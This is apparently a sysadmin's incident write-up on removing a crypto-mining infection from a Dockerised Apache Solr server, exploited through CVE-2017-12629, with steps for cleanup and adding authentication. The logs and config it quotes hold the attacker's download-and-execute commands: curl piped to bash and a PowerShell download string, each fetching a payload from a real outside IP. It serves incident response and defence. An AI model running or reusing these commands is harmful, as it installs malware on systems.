Prehistory:

1. My friend's site started to work slowly.
2. This site uses docker.
3. htop told me that all cores loaded on 100% by the process /var/tmp/sustes with the user 8983. Tried to find out what is sustes, but Google did not help, but 8983 tells that the problem in Solr container.

4. Tried to update Solr from v6.? to 7.4 and got the message:

   o.a.s.c.SolrCore Error while closing ... Caused by: org.apache.solr.common.SolrException: Error loading class 'solr.RunExecutableListener'

   Rolled back to v6.6.4 (as the only available v6 on docker-hub https://hub.docker.com/_/solr/) as site should continue working.

5. In Dockers logs I found:

   [x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-listener":{ "exe":"sh", "name":"newlistener-02", "args":[ -"c", "curl -s http://192.99.142.226:8220/mr.sh | bash -sh"], "event":"newSearcher", "class":"solr.RunExecutableListener", "dir":"/bin/"}}]

6. So at http://192.99.142.226:8220/mr.sh we can find the malware code which installs crypto miner (crypto miner config: http://192.99.142.226:8220/wt.conf).

7. Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can find full config, but right now we need just listener section:

   "listener":[{ "event":"newSearcher", "class":"solr.QuerySenderListener", "queries":[]}, { "event":"firstSearcher", "class":"solr.QuerySenderListener", "queries":[]}, { "exe":"sh", "name":"newlistener-02", "args":["-c", "curl -s http://192.99.142.226:8220/mr.sh | bash -sh"], "event":"newSearcher", "class":"solr.RunExecutableListener", "dir":"/bin/"}, { "exe":"sh", "name":"newlistener-25", "args":["-c", "curl -s http://192.99.142.226:8220/mr.sh | bash -sh"], "event":"newSearcher", "class":"solr.RunExecutableListener", "dir":"/bin/"}, { "exe":"cmd.exe", "name":"newlistener-00", "args":["/c", "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"], "event":"newSearcher", "class":"solr.RunExecutableListener", "dir":"cmd.exe"}],

8. As we do not have such settings at solrconfig.xml, I found them at /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings of this file can be found at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay

Fixing:

9. Clean configoverlay.json, or simply remove this file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).

10. Restart Solr (how to Start\Stop - https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart docker container.

As I understand, this attack is possible due to CVE-2017-12629:

1. How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/

2. CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc

... and is being fixed in v5.5.5, 6.6.2+, 7.1+

which is due to freely available http://example.com:8983 for anyone, so despite this exploit is fixed, lets...

11. Add protection to http://example.com:8983

    Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin

    Create security.json with:

    { "authentication":{ "blockUnknown": true, "class":"solr.BasicAuthPlugin", "credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="} }, "authorization":{ "class":"solr.RuleBasedAuthorizationPlugin", "permissions":[{"name":"security-edit", "role":"admin"}], "user-role":{"solr":"admin"} }}

    This file must be dropped at /opt/solr/server/solr/ (ie next to solr.xml)

    As Solr has its own Hash-checker (as a sha256(password+salt) hash), a typical solution can not be used here. The easiest way to generate hash that Ive found is to download jar file from here http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.

Because I use docker-compose, I simply build Solr like this:

# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/

# project/sources/docker-compose.yml (just Solr part)
solr:
  build: ./dockerfiles/solr/
  container_name: solr-container

  # Check if 'default' core is created. If not, then create it.
  entrypoint:
    - docker-entrypoint.sh
    - solr-precreate
    - default

  # Access to web interface from host to container, i.e 127.0.0.1:8983
  ports:
    - "8983:8983"
  volumes:
  - ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default  # configs
  - ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data  # indexes